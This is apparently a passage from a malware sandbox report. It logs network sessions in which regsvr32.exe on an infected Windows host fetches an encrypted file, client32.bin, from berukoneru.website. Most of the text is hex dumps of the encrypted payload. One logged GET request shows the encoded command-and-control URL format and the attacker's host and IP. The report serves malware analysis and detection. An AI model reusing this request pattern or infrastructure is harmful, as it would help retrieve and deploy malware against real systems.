0f 55 2b 2c 63 fb 6e 23 e0 db 15 62 b0 e6 58 39 83 be 59 c0 47 8e d9 a8 ec 90 d7 8d 20 b1 e1 52 0c 48 ce 55 3d 91 82 8f 5b 21 6b 1b 05 9f fc c0 25 33 91 d4 d9 df 43 5b 44
                        Data Ascii: I01Ez#<M&;'O? ^b,Gk,lhu3KdSg"OOXUHj!^*6d<yb#5g%d930)_N.'>w6Jwap%I^o/35|r69=~vD}D0!U+,cn#bX9YG RHU=[!k%3C[D
                        2021-12-14 09:34:08 UTC1534INData Raw: d6 fa 44 6c f8 d1 11 bb c5 65 a2 b5 38 a6 07 d5 c6 7c 71 ca 80 c3 34 7e 53 c8 15 31 2d 39 36 14 a4 d2 38 de 0a c7 1a 30 94 6f 5e b4 cd a6 2a bf 96 98 9f 38 d0 8a fa ee 97 38 34 6e d6 b9 9d b4 c4 b5 67 d8 1f 07 13 81 d4 ac 50 57 fd 2e 62 f2 6c f0 b5 95 d6 64 ec 7e 6c f9 19 f3 7d d7 6b ff a1 f2 67 fe 49 6c 0f 94 fc ba 1d 91 de 22 cc bb 6a e5 62 5f d2 90 f7 81 62 d5 65 f5 65 e2 c2 33 fb cf 2a 9b e2 0f cd 79 34 37 96 43 77 f3 2e 74 b4 7b df b2 d0 fc 5b 53 32 8e 6b 00 b9 ba 0b da f1 fb b0 43 f9 cd ec e7 5d 31 ab 8f 07 25 90 ea f3 ae 6d 36 9c 82 ea df 9a 6d 22 ee e5 74 fb bf d0 69 75 c1 f8 cd a5 56 65 94 8e c7 29 4d 83 de d3 14 0a 3a 79 8f e3 32 30 36 7c af 34 fc 97 c1 9e 01 27 38 87 51 4c 45 2d 05 b4 d2 c9 6e b3 f3 49 7b 47 76 60 cb d2 b4 8d 67 96 ff 7c b6 e4
                        Data Ascii: Dle8|q4~S1-9680o^*884ngPW.bld~l}kgIl"jb_bee3*y47Cw.t{[S2kC]1%m6m"tiuVe)M:y206|4'8QLE-nI{Gv`g|
                        2021-12-14 09:34:08 UTC1748INData Raw: 4b 4a 7e 32 f6 73 45 d5 ff f6 fc bf 13 4b 42 84 a3 0e c2 b2 76 46 78 8b fc d9 4f 81 7a 06 43 3f 27 a3 1a 09 fb 94 90 13 bf 09 81 aa 88 1d ec 67 29 52 5d 88 5c 4d 0e ad f8 c6 d7 d1 95 fe 9a 0e 65 45 7b a6 89 93 24 93 52 a1 81 b9 6d 1d ef 25 bb 29 6c 81 06 bf c7 5f 51 9b e9 3e 78 89 47 47 ab 4b 3d 15 22 4f 21 80 3d 77 b1 bc 5e 75 c2 49 92 e6 79 fe ba 7f af 13 aa 23 47 10 4f 82 94 97 51 c3 fc aa 3e 7c 34 82 b0 ac 44 bc de ab ae cc a5 29 b8 ad 09 ba 0e 7b 51 fe 91 81 5a 19 8f 57 5a f9 a8 ae 61 75 e1 13 42 a4 59 c4 c5 7e 7c 59 9a 76 8c cf 66 89 1b bc b9 41 1b c1 61 40 18 0e f5 8f e3 3f 5f 32 4f 56 af a5 bf 17 78 b6 3b 97 ec 5b bc 1e 06 79 33 e2 4f bc ee 17 a8 1a c9 0d e3 91 19 e0 11 f2 6a 6a 6e 85 77 f3 7a cc fd f0 dc 74 ed eb 91 6f d8 20 a1 ad ad 9e 93 ec 11
                        Data Ascii: KJ~2sEKBvFxOzC?'g)R]\MeE{$Rm%)l_Q>xGGK="O!=w^uIy#GOQ>|4D){QZWZauBY~|YvfAa@?_2OVx;[y3Ojjnwzto
                        2021-12-14 09:34:08 UTC1764INData Raw: c2 61 cf 8c 2f b2 24 45 8c 67 0a e0 9e 0e d3 56 02 f9 ae c6 0b 8c b0 20 6a 9d bf fe f5 1e 76 8f 67 44 ce cb 4d a2 f3 dc 19 39 a2 ab 10 99 a2 d3 ee a6 fc cb 20 dd 11 8f e5 35 c2 2f af 2f 4c 71 bf dc 14 a7 a7 25 6e 72 73 66 fc a8 c2 13 63 cc 5f 88 7e 1d 7e 17 a4 4a 3a 4c 21 39 d1 3c 9f 49 ec e7 5a c6 02 30 fd 73 16 56 e6 4b 80 e3 3c 27 15 d1 23 c8 c3 d5 29 d0 84 95 91 11 76 5c 2c 31 75 7c a8 95 fc c1 2e 9b 9c 7a 0c 44 ea 83 dd c1 33 67 e4 0b a3 7c 84 b4 76 dc 53 d7 5b fc 1c ea 9f b4 8f a0 8f fd e8 8e 42 6d 63 4c e9 06 af 2e b8 17 ef f8 84 af a5 28 63 89 93 7b 49 a3 69 49 d6 85 59 ef e5 c0 af 5c da 1e 71 fe a9 4d b7 a8 8a 8c 33 f6 60 76 57 c9 37 29 0e 9c 32 bc 23 8c 03 9e 69 1c 29 5a 9a 5a 05 2d 8c be a5 d7 8a b0 a4 dc 83 27 05 9d 94 30 a3 16 e0 56 34 b8 41
                        Data Ascii: a/$EgV jvgDM9 5//Lq%nrsfc_~~J:L!9<IZ0sVK<'#)v\,1u|.zD3g|vS[BmcL.(c{IiIY\qM3`vW7)2#i)ZZ-'0V4A
                        2021-12-14 09:34:08 UTC1780INData Raw: 58 d8 82 37 37 ab b8 52 c0 ec 8a 18 10 63 05 5d 1d d8 dd 36 47 4c 16 7d be 55 2c 10 d9 d7 04 d0 6c ed 03 56 8c 14 1b 07 e9 94 da 52 77 c2 86 6e b5 00 89 c1 06 dc f8 69 51 53 db 22 07 31 cc 1c ee be 3a 7b 91 14 87 58 ea 30 22 73 7d 62 0e b9 a3 c5 27 36 d8 b3 72 c1 9f a7 0f db 01 4a 9e 8b d4 44 77 58 f6 71 0c 81 c8 4e 8b f7 39 34 39 c9 43 8a 8a 0b 91 e3 94 4b 72 07 23 e3 78 94 1e 0a 14 07 9e 75 1d e1 c9 d1 8c 55 6e ab 99 25 d4 bc e6 d5 df 36 04 e0 35 72 29 a6 5f d9 16 9d a3 4f a3 6d 29 46 14 76 cb 7e 09 03 2a 63 0e 4d 08 71 1e 60 13 78 d5 13 c9 72 b2 7b 4e 58 72 a5 c9 3d 3f e7 27 20 3f 72 e5 b6 2f a2 df 47 79 4a fd 4f 62 27 41 80 d8 4d bd 23 e3 5b 0d 6f 9d 60 e0 2f 6a f8 08 fe 5f be 65 4c 01 10 17 3f a4 3b 13 54 73 4f be 11 4d 2e 67 b0 7c 64 16 b1 0d eb 8a
                        Data Ascii: X77Rc]6GL}U,lVRwniQS"1:{X0"s}b'6rJDwXqN949CKr#xuUn%65r)_Om)Fv~*cMq`xr{NXr=?' ?r/GyJOb'AM#[o`/j_eL?;TsOM.g|d
                        2021-12-14 09:34:08 UTC1796INData Raw: ad b5 bb ed 0d 6f fe 1f 7f 86 8f fb 11 eb f2 40 6d 1f 14 53 43 51 28 3f e7 0a 47 d5 db cd c8 70 8a e8 da 39 bb c0 6f 0b 3a 21 73 c2 e0 f8 2d a1 9f d2 32 5c 95 c8 01 fa 0e 55 44 86 da 31 1e 25 36 8a 46 a6 4a b6 37 f5 5b 7f de 73 86 05 1c f7 e5 c9 e8 6a 18 f5 11 36 a4 87 e6 8a 1b 07 8c 6f eb dd 08 40 37 d2 2d d1 b5 fa 1f dd d0 aa 6f 1d 50 27 42 11 01 ef ef e7 bb ad 89 dd d2 88 38 ba 99 fe 1f 7e 61 a4 50 4b b8 9f 34 43 ba 83 bf 27 f6 98 90 eb 3e c5 da 90 dd 8f a8 de ee 1e ee a6 57 4c 7f 14 48 c6 be 8a f8 14 ac 55 17 3f 05 01 b0 57 b9 2a eb 92 d8 7c 14 f2 7f 2d 2c 0f e5 44 eb 89 ca e5 0e 49 b3 c7 ec af 37 30 17 6e d6 7f 0f 3e a1 1d 9b c4 a4 41 e8 06 f5 59 3a 34 f9 9b 4c a6 fa 47 19 14 3a 2b e6 6a 3d 17 ad 5e 14 57 8b 5d 98 74 f3 f5 eb 21 33 1a 25 e4 69 5a b5
                        Data Ascii: o@mSCQ(?Gp9o:!s-2\UD1%6FJ7[sj6o@7-oP'B8~aPK4C'>WLHU?W*|-,DI70n>AY:4LG:+j=^W]t!3%iZ
                        2021-12-14 09:34:08 UTC1812INData Raw: 23 42 3a 98 04 6b 9e 98 bf 84 15 9c 74 2f 09 42 c9 7c b7 bd c7 ab ec d1 22 f0 c8 c9 b2 2e 13 3e c8 52 28 8d 3d ed 31 bc 32 e3 bb 37 82 f9 c5 c7 92 63 a2 72 41 39 e0 24 a7 24 6d 36 be 05 96 c3 05 da 3e 4f ef fd a6 f3 22 36 fa 2f 41 c8 fa 8f 6b fb 5d 6f 7d f5 34 eb 55 56 e6 d8 15 9b 25 f1 ce 5b c8 be 00 d9 09 05 fc b1 5c 17 08 57 cd d0 8a 30 84 9d af 37 c7 99 e3 42 6f 44 85 bc 07 52 f3 47 24 f5 b1 b5 e4 ca 8a 22 4b 81 72 71 29 39 4c 58 0e b9 5a 1f 44 81 a9 db 49 d4 8f 8c 56 7b 54 0d df bd 59 80 40 99 b8 85 7e 9e 15 a6 58 a6 ac 38 13 22 89 c4 cd 01 1a 8b 52 be bd 5d db 46 3d b8 b5 b6 9d 40 68 a2 d1 26 d5 3f d5 8a 27 7b 6f 14 a1 20 23 f6 81 dd 0c d5 9c a5 4f 93 66 ff 4b c4 d1 3e 54 be ed 1e 89 fc e4 0e aa 7b 1d 06 a6 c4 77 50 7e 63 97 4f bd 49 b6 ab 17 05 84
                        Data Ascii: #B:kt/B|".>R(=127crA9$$m6>O"6/Ak]o}4UV%[\W07BoDRG$"Krq)9LXZDIV{TY@~X8"R]F=@h&?'{o #OfK>T{wP~cOI


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        7192.168.2.54980379.110.52.144443C:\Windows\SysWOW64\regsvr32.exe
                        TimestampkBytes transferredDirectionData
                        2021-12-14 09:34:07 UTC1101OUTGET /tire/SxP522LQqV7N0J/d6o3ODGgGiBAGfgE9kDAi/iJ3hZ0ExIl8p4ocR/5jXJfG8mFLCjP71/7NSaKdzhGeEI1UdiPa/8FnVHvkbS/kpLNStxRjAnliuJ5EZNG/gq3G4NvVU_2BCUhovI0/u7jwUo5n_2BL68IOoZxv34/oRctSCfqONUBa/hRxyIlRY/aB2W4yGH6sVrPB1xJM1YXlq/jJC_2B1iv6kvD5/bMsiwtIS.eta HTTP/1.1
                        Cache-Control: no-cache
                        Connection: Keep-Alive
                        Pragma: no-cache
                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                        Host: berukoneru.website
                        2021-12-14 09:34:08 UTC1166INHTTP/1.1 200 OK
                        Server: nginx/1.20.1
                        Date: Tue, 14 Dec 2021 09:34:08 GMT
                        Content-Type: application/zip
                        Content-Length: 268426
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Set-Cookie: PHPSESSID=g1gq8askkhd329edj5m5lndu22; path=/; domain=.berukoneru.website
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: public
                        Pragma: no-cache
                        Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:07 GMT; path=/
                        Content-Transfer-Encoding: Binary
                        Content-Disposition: attachment; filename=client32.bin
                        2021-12-14 09:34:08 UTC1166INData Raw: 58 1b 91 63 b8 aa 05 14 26 b5 4a 87 75 c1 a0 26 9e 3c 11 6e 71 42 96 26 99 7a 08 52 54 2f 31 7f 58 90 87 ef 21 eb 4d ac aa 62 d0 f5 9e 65 dd b1 86 a9 14 c8 ae 98 d4 b6 d6 60 d1 47 77 cd be 8c 6e b1 66 d1 e8 7a 10 1e c8 8c 97 db c5 0f 0b 40 05 e7 84 c2 c8 34 df 33 e6 dc 52 e3 46 f4 95 b7 af 93 01 65 a9 71 60 bf 1f 51 95 4a f0 de 35 3e 05 cd 02 6e e9 85 80 bb d0 9e 8a 75 b1 3b 1e 78 47 1f 6b 12 e2 6d 4a 11 60 95 cc b0 70 f1 9e 77 55 2f 09 91 10 e8 d7 e3 05 c1 1d c9 ea 2f 96 3d 82 e8 0e ae b5 77 75 a5 0d bc 2f f1 b6 c5 47 94 e1 2d 77 eb d0 a1 8b a7 ad 18 90 fa 77 82 10 81 a4 59 32 4a 80 82 20 cd 7d 1d 20 6f 17 d7 8e 41 9a d0 fb 32 98 6c 3b da 81 8e 51 5e cb e0 92 a7 47 9a 9d c8 4d ed 20 99 cb 03 c1 2b 49 00 fa b7 08 c4 02 c1 94 c4 b3 eb 0b 87 5e bf 36 f0 75
                        Data Ascii: Xc&Ju&<nqB&zRT/1X!Mbe`Gwnfz@43RFeq`QJ5>nu;xGkmJ`pwU//=wu/G-wwY2J } oA2l;Q^GM +I^6u
                        2021-12-14 09:34:08 UTC1182INData Raw: 53 07 cb b8 4e 62 9c b0 52 21 3d c4 3d 76 91 43 af 38 7c 50 14 41 e7 bd 39 dd 41 f5 8b 56 ab fc e5 6d c6 be ea b9 6f ac 49 c3 e4 fc 2c 2e 24 77 88 18 d0 d6 0d e2 48 70 d9 46 b0 89 af 38 9c 24 3c b1 b0 63 e5 b0 08 90 17 71 54 ef f8 87 9d 1e 42 a7 fd 9a 63 c3 82 40 5b b8 56 fe 88 58 4d 03 7b 4a c1 3e 01 55 8d a2 04 94 51 bf c3 70 6b d2 e2 08 64 3d df 31 53 f8 f6 69 5e 2b 60 1e 2f 64 eb a0 41 2e cb 53 06 1f a2 63 54 77 f5 61 29 3a 5a fb 59 8c ff 2a c8 82 0d 0a b0 a7 75 fb 71 92 04 b8 69 03 b4 45 51 d3 95 71 f0 db 15 b4 fb c5 0d 33 ef a0 0b 56 c4 42 43 9e a7 a1 d1 7f 09 fe c9 cc 52 6e cb 80 08 2a 8e a8 9e fd e5 c4 23 ad ed bd 3e 84 71 6f 32 b7 23 76 bd f0 aa 04 aa 58 67 b0 ae 2d e0 9e 97 be 39 61 1a 42 24 de 9f 09 a5 12 54 85 a1 89 71 fa a7 21 f9 6e ff 48 25
                        Data Ascii: SNbR!==vC8|PA9AVmoI,.$wHpF8$<cqTBc@[VXM{J>UQpkd=1Si^+`/dA.ScTwa):ZY*uqiEQq3VBCRn*#>qo2#vXg-9aB$Tq!nH%
                        2021-12-14 09:34:08 UTC1294INData Raw: e7 b0 40 b0 31 3b 8f 49 34 9e 9d 07 a7 2a 47 1a 98 b8 bb ef 61 5f ed 3e 4c 3b 59 ec 5e 3a 76 d9 c1 67 5c 2e 34 de 0d 85 63 85 90 eb e4 ee a5 b8 ce e5 27 ab ed f1 46 e0 2a 79 16 27 a9 fc b8 cf 65 bb bf d4 90 e2 e0 3c 0b de e6 54 f2 ef 2e be 6b fc 2c 61 d4 bc bc 78 9e 57 3a 13 f3 b3 15 e0 74 c2 74 c3 e1 7a b9 e4 c1 3b 07 41 66 37 d9 18 e3 65 ba 35 bd 4f 40 fc 90 eb c9 45 3c ed ba 8f 96 10 0b e4 14 da a9 b8 8c 11 b2 96 cf a0 6d af e4 4f c4 a4 69 fd f3 64 92 ef 16 b1 cf c1 d4 e9 4f 21 c8 1b 40 8e f5 06 bb 3f a1 f0 76 28 07 ee 59 f8 cd 20 06 01 fd e9 a0 fc 2d ee dc 88 96 0b 46 af a1 33 eb a0 c7 4e a9 5c 03 33 28 8c ca 8f d8 6c 19 1d 8f 80 97 7e b9 38 71 06 4f 9b c4 2d f9 c3 af 26 49 23 e0 0a 10 0e 09 e0 18 f6 ae d4 cb 86 15 1d 08 c5 ff e8 8d 3d 16 53 16 b4 c9
                        Data Ascii: @1;I4*Ga_>L;Y^:vg\.4c'F*y'e<T.k,axW:ttz;Af7e5O@E<mOidO!@?v(Y -F3N\3(l~8qO-&I#=S
                        2021-12-14 09:34:08 UTC1342INData Raw: 45 db 6c 2a 63 aa 06 70 d0 6b 08 5b 47 fa c5 46 f3 38 99 a1 5d cc ba 11 e3 7e a5 1e 73 fb a9 d1 cb a2 38 03 98 b3 a6 13 bd fa 0c bd cb 3d 30 a4 92 94 e1 ea ba 97 05 66 b9 79 98 c6 56 aa 73 54 58 3d c0 60 d7 30 76 6d 4f e1 cb d0 a7 7b 54 a9 1f f1 d3 15 64 69 54 3b 42 6f a0 02 ae 6e 26 9b 48 e2 07 8c cb 20 9e b8 e7 5f b5 44 63 51 8f cc 68 40 45 da 42 e1 26 c3 48 56 35 4f 6e c9 96 89 0c c7 f1 ba 24 ba 83 f0 45 05 98 ec 4a 92 f6 f3 44 8a 27 ff 23 80 ae 70 e7 ea 9f cb 0a ab 3f 5e 7f 1f 38 05 43 d0 fd 66 cf ed 46 fd dc 7c 23 bc bd 8c 68 7d 4d 99 6f e0 32 34 87 aa c5 a8 35 09 d2 c7 60 38 ac 2d 95 b3 ee 1f c1 52 22 e6 12 b0 07 3f a8 53 75 fa ff cb b8 9a ac c4 ce 88 1b 59 1d 72 ab a4 6b 2b 17 94 74 4b 8e 70 9e 76 ff 8b 6c 0c 30 0b 09 54 f3 70 a5 8a aa 43 01 be 96
                        Data Ascii: El*cpk[GF8]~s8=0fyVsTX=`0vmO{TdiT;Bon&H _DcQh@EB&HV5On$EJD'#p?^8CfF|#h}Mo245`8-R"?SuYrk+tKpvl0TpC
                        2021-12-14 09:34:08 UTC1358INData Raw: b9 b3 89 36 a0 10 70 11 ee 76 04 aa f4 39 8a 26 d4 29 d7 d0 ba bb d2 9e ff 36 cc f6 8b 3a 1a f6 f1 07 b3 88 26 61 19 fa 05 f4 86 56 44 b7 bb d2 49 24 96 90 b9 8d a7 e0 88 c2 e4 b3 80 23 5a 22 bf 34 49 c2 2b 10 c7 df 0e e7 7d b2 2c 46 10 12 fa 63 8d 6c 77 94 24 a1 1f 78 d0 cc 65 5b 7c 8a d7 ba 5e 54 fe e7 bf a4 3a f2 31 5a 79 3e a4 48 aa 3d d5 6a ee a2 62 1e 62 a8 4c 65 ce 69 6b 81 6e e1 9e 3c 50 8d 5b bf 47 41 9f a8 b8 98 6f 92 de 70 83 81 ea ef e4 df c4 31 d6 84 a7 5d 99 6f 78 56 b8 1c f8 44 db b5 1d a0 95 e6 0c 26 aa 44 86 22 aa 52 ae 80 ee f4 41 9c 26 7c 67 ed a8 4e 37 b5 7e f6 f0 ea ce 5f c5 06 cb 55 9c 65 9e c7 e8 00 a6 00 43 1a f8 e2 6f 8e 1e 8c 65 88 0b 33 05 85 4a 32 5e 64 82 e4 67 70 43 e5 fc d0 07 dd 85 66 6d 6b 0c 68 07 1f 46 f8 ba c6 55 80 cf
                        Data Ascii: 6pv9&)6:&aVDI$#Z"4I+},Fclw$xe[|^T:1Zy>H=jbbLeikn<P[GAop1]oxVD&D"RA&|gN7~_UeCoe3J2^dgpCfmkhFU
                        2021-12-14 09:34:08 UTC1550INData Raw: 78 71 76 31 33 bc b7 0d c3 de 27 b9 e0 41 88 eb d3 68 96 04 e0 a3 0b 36 53 fd 2a 4d 2f 82 25 1c 70 e4 3f df 1e b6 ee 36 26 e8 83 d9 db 55 4a 5f 9e fb 35 bd 90 d8 cf e2 60 85 21 8a ca e3 72 a8 a1 08 41 78 fc 7c 2c 27 f4 20 a9 b9 fd 24 f1 24 3f fe 94 22 1f 4a a2 89 18 ac ac 87 3a b3 37 10 5d f7 83 1a 75 a9 ca d7 19 08 20 be 46 78 23 ed 7e 89 c7 b2 59 87 53 ec 33 70 85 97 13 b5 7b 44 20 9b 67 94 ea 69 ac ac 4d db 54 a3 61 cf a9 0d d8 10 67 82 3d 2b d5 9c 21 be 3f e2 16 18 9d e4 78 52 a4 7d c6 8a 77 73 ce 0f b4 37 7f ca a5 b1 be 65 af f7 f4 af 6b a3 bd c2 a1 b2 f9 52 59 8c bd d6 6d 1b 49 59 57 cb 23 8f 9f cb 4a a3 12 7c 63 ae 4c d0 f6 f5 da 3d f5 51 94 3f bb e3 b9 56 cd 1e 4a 19 99 fa 31 9b a4 51 ac 78 89 24 c2 e1 9f c5 ab 4d 38 7d 98 e0 38 fc 6d fb 7f d9 88
                        Data Ascii: xqv13'Ah6S*M/%p?6&UJ_5`!rAx|,' $$?"J:7]u Fx#~YS3p{D giMTag=+!?xR}ws7ekRYmIYW#J|cL=Q?VJ1Qx$M8}8m
                        2021-12-14 09:34:08 UTC1582INData Raw: b4 60 44 97 27 1f 21 1f d0 2f ee 48 10 3e c5 6c 33 ba ab 56 30 71 11 00 92 c5 c1 bc 66 45 ac 84 d1 09 08 c1 a4 6e fa a9 3d bd 53 ba 60 d9 86 1f 61 02 41 f1 b4 f1 a3 4e 1f fb 49 76 1a 69 04 18 96 d5 40 41 0f 01 30 43 c5 3a 64 c0 69 40 59 d0 79 72 63 bf 4e b6 d6 5f 07 58 61 f7 90 a4 f9 08 c9 da 62 84 96 47 39 af 7a 24 a8 3f 44 47 80 46 6e 86 1b c4 f1 8b 20 c8 b5 ff 9d 59 83 72 67 dc 53 42 27 f8 dd 5c f8 ec 3f f3 9d df 40 c3 59 19 b9 61 5d 0a d0 76 4a ba fe cb 76 15 05 42 32 43 76 df 71 a5 91 73 4c 46 d6 87 eb c9 66 a6 96 7b 6d fe f6 ca de ff 88 d0 f6 e9 f5 04 48 89 18 70 91 a4 2b 83 db 4b d3 1c 1c f5 ba 0f d9 39 57 5a 1f 17 c4 00 79 61 af a5 a6 0e a0 e8 de a4 96 86 bf bd 5b f9 2d 27 92 80 fe 63 93 0c b5 49 f5 38 79 ac 61 63 9c 01 f1 ee df 76 f8 e5 83 7e 57
                        Data Ascii: `D'!/H>l3V0qfEn=S`aANIvi@A0C:di@YyrcN_XabG9z$?DGFn YrgSB'\?@Ya]vJvB2CvqsLFf{mHp+K9WZya[-'cI8yacv~W
                        2021-12-14 09:34:08 UTC1646INData Raw: c6 16 99 f3 a4 fe 24 ea 90 c4 e0 29 ca cb 52 bf 65 c0 7a cb 51 b2 b2 b7 57 79 73 38 52 ba 5a bc 4c 22 40 1d 19 b5 1c 82 37 66 72 7a 08 22 07 27 40 84 8b 5e f6 28 53 e6 b4 ec 9b 67 a1 a7 03 8f 6c 4a 4d 12 c3 da 7e a8 53 51 f8 cd 89 8c b9 52 85 a1 d8 01 df 09 06 ee 13 00 0e a7 70 26 89 41 da 6d fb db 2f af 16 ad 02 d5 29 0a 4e cf c2 35 b6 0a 26 11 b4 f5 f2 82 4b dd b8 84 a8 aa 2a c9 ca 48 c4 34 61 bb 76 c0 de cb 0c 5c 8b c7 9f 3b 49 17 4c f5 8b dd 7a c1 0b 4a 35 d0 be ab f7 e6 a7 43 03 6e 29 c7 df 2d b0 79 31 f8 86 19 32 81 8e e0 4f 45 87 07 89 46 26 9a 65 b3 76 6f 12 77 fd 5d b6 98 f7 39 4f 6f 57 e1 a1 da 5f 6b 71 53 ad f0 06 c4 15 97 4e 02 e0 c3 33 22 01 d7 19 f4 6f 3d de 8d d9 4c 13 c8 e0 95 12 74 55 73 72 a5 5f 83 9d 74 b1 5b d4 c0 73 ee 7d 1f bf 73 a7
                        Data Ascii: $)RezQWys8RZL"@7frz"'@^(SglJM~SQRp&Am/)N5&K*H4av\;ILzJ5Cn)-y12OEF&evow]9OoW_kqSN3"o=LtUsr_t[s}s
                        2021-12-14 09:34:08 UTC1662INData Raw: 8a 95 bf 32 84 5e 76 15 88 cd 1f 9d d9 af 1b 24 c9 22 47 79 35 37 09 c6 d8 7e 27 47 2e 10 a1 b3 5b 24 c7 aa a8 03 00 c5 f4 aa 54 55 49 85 5b 49 b2 cc a2 5a ff 21 cd f5 b2 48 99 9f 29 da 5e f5 ee 59 21 b3 7a 12 71 e8 77 cd 3b 1f a7 84 6b dd 6e 75 68 60 c1 ea 3c c3 d4 41 9a fe ae e6 34 bc 08 a1 46 64 26 66 4c 90 ed 50 d9 be c6 d5 7a 2c d9 b2 5a e4 f8 f8 8d 45 b3 2c 15 2c ad de c1 5a fd 4e 28 de 6a e9 ff c0 fd 35 e9 57 90 7c 6b b6 ea 1a 5a b1 76 15 34 93 69 f2 35 55 5a 0b 18 cd 6c f7 aa 27 6d 48 5c c9 9a d8 8f 58 c3 f7 bc bc 0f 9b 2c 71 e8 01 14 70 24 ed 50 5c 6f f5 1e b0 11 fd 45 15 69 45 3d 3a f5 85 b8 64 94 bb 5e 33 9c 63 8a 60 52 7f 2f 5d 5f e7 5b 8a 81 02 98 a6 97 ae 88 75 55 72 18 63 80 fc da 9e 79 b4 4f db e3 38 dd 8a df 4f ca 3f 74 56 fe 61 02 7f 87
                        Data Ascii: 2^v$"Gy57~'G.[$TUI[IZ!H)^Y!zqw;knuh`<A4Fd&fLPz,ZE,,ZN(j5W|kZv4i5UZl'mH\X,qp$P\oEiE=:d^3c`R/]_[uUrcyO8O?tVa
                        2021-12-14 09:34:08 UTC1700INData Raw: a8 d4 95 b0 78 6a 51 c3 88 29 00 f7 a0 84 fe 40 04 18 2e ef 9c 27 9d fe 2e 7f 57 0f 47 7e 58 ad fd 7d c9 6e 23 3f 22 b2 a4 9f ed 28 62 16 d7 bc fb 23 4a 86 93 35 4e ab fa bc e6 cd f5 3f 33 fb 84 70 77 8d 54 5d a3 de 9f 6b 30 00 f1 82 7c dc 5f f2 1d 45 f3 19 55 be 0c 4c 1c 0e 7e fb f7 32 ed 48 d6 a1 49 ec 55 42 6d 91 57 f7 df b4 1a 0d b6 af 23 6b 5e d1 e5 f5 65 ba a7 5b 33 e1 0e 26 21 79 08 33 73 6b 85 13 c2 2a b4 92 5f db 48 5b c1 22 1e 4b cc 13 e8 7a a3 ed d6 6e 4e e8 f6 e4 cd b4 ab d2 6c 6c dc 9b 46 e1 b4 59 87 7d 59 de 09 28 18 da b7 a3 db 92 78 c3 bb cf e4 db bb 9b c8 20 82 fc e2 7b 61 40 74 fa 59 a4 48 a2 bd 7a 16 d5 4a 04 f5 dc 5d 96 8d 8e a4 60 4b d6 da 45 0d a5 7d 4a 3f c7 4a 7d 82 53 c3 fa 18 71 d6 d5 c7 21 14 7c bc 89 7c d8 6b b0 7e 18 fe 07 31
                        Data Ascii: xjQ)@.'.WG~X}n#?"(b#J5N?3pwT]k0|_EUL~2HIUBmW#k^e[3&!y3sk*_H["KznNllFY}Y(x {a@tYHzJ]`KE}J?J}Sq!||k~1
                        2021-12-14 09:34:08 UTC1716INData Raw: be be 49 af 90 c1 30 31 45 7a 23 e6 e4 04 bb 3c a2 06 4d f2 c4 c5 26 f4 3b 9c 27 4f 3f 93 20 5e bb eb 62 2c 47 6b 9f 9b 2c d2 e3 6c 68 75 33 14 4b 09 e4 a1 64 f8 e4 83 d8 d3 e4 53 bb 01 67 f0 22 4f 96 18 4f 58 c1 85 55 48 6a 11 21 5e dd ec d1 97 0d 2a 8f 36 16 ff 64 b9 84 84 3c 79 1b 07 62 23 c8 35 8d bc 67 25 a8 18 64 c1 39 82 33 c8 b2 80 86 30 f6 29 f4 b5 b6 5f 4e db c4 ec 85 2e 27 ea d7 85 3e 83 83 d7 a9 77 90 36 b4 a0 4a 77 61 92 70 be ad a8 f5 af 1a 1a 25 1d 49 5e 6f ba a2 8f 2f de 33 8e fc 35 7c e6 72 f6 dd 98 36 e1 39 09 3d 7e b0 76 1f cd 44 7d 44 f5 30 af 1c 8c d8 1b 21 f2 ee 9f 0f 55 2b 2c 63 fb 6e 23 e0 db 15 62 b0 e6 58 39 83 be 59 c0 47 8e d9 a8 ec 90 d7 8d 20 b1 e1 52 0c 48 ce 55 3d 91 82 8f 5b 21 6b 1b 05 9f fc c0 25 33 91 d4 d9 df 43 5b 44
                        Data Ascii: I01Ez#<M&;'O? ^b,Gk,lhu3KdSg"OOXUHj!^*6d<yb#5g%d930)_N.'>w6Jwap%I^o/35|r69=~vD}D0!U+,cn#bX9YG RHU=[!k%3C[D
                        2021-12-14 09:34:08 UTC1732INData Raw: d6 fa 44 6c f8 d1 11 bb c5 65 a2 b5 38 a6 07 d5 c6 7c 71 ca 80 c3 34 7e 53 c8 15 31 2d 39 36 14 a4 d2 38 de 0a c7 1a 30 94 6f 5e b4 cd a6 2a bf 96 98 9f 38 d0 8a fa ee 97 38 34 6e d6 b9 9d b4 c4 b5 67 d8 1f 07 13 81 d4 ac 50 57 fd 2e 62 f2 6c f0 b5 95 d6 64 ec 7e 6c f9 19 f3 7d d7 6b ff a1 f2 67 fe 49 6c 0f 94 fc ba 1d 91 de 22 cc bb 6a e5 62 5f d2 90 f7 81 62 d5 65 f5 65 e2 c2 33 fb cf 2a 9b e2 0f cd 79 34 37 96 43 77 f3 2e 74 b4 7b df b2 d0 fc 5b 53 32 8e 6b 00 b9 ba 0b da f1 fb b0 43 f9 cd ec e7 5d 31 ab 8f 07 25 90 ea f3 ae 6d 36 9c 82 ea df 9a 6d 22 ee e5 74 fb bf d0 69 75 c1 f8 cd a5 56 65 94 8e c7 29 4d 83 de d3 14 0a 3a 79 8f e3 32 30 36 7c af 34 fc 97 c1 9e 01 27 38 87 51 4c 45 2d 05 b4 d2 c9 6e b3 f3 49 7b 47 76 60 cb d2 b4 8d 67 96 ff 7c b6 e4
                        Data Ascii: Dle8|q4~S1-9680o^*884ngPW.bld~l}kgIl"jb_bee3*y47Cw.t{[S2kC]1%m6m"tiuVe)M:y206|4'8QLE-nI{Gv`g|
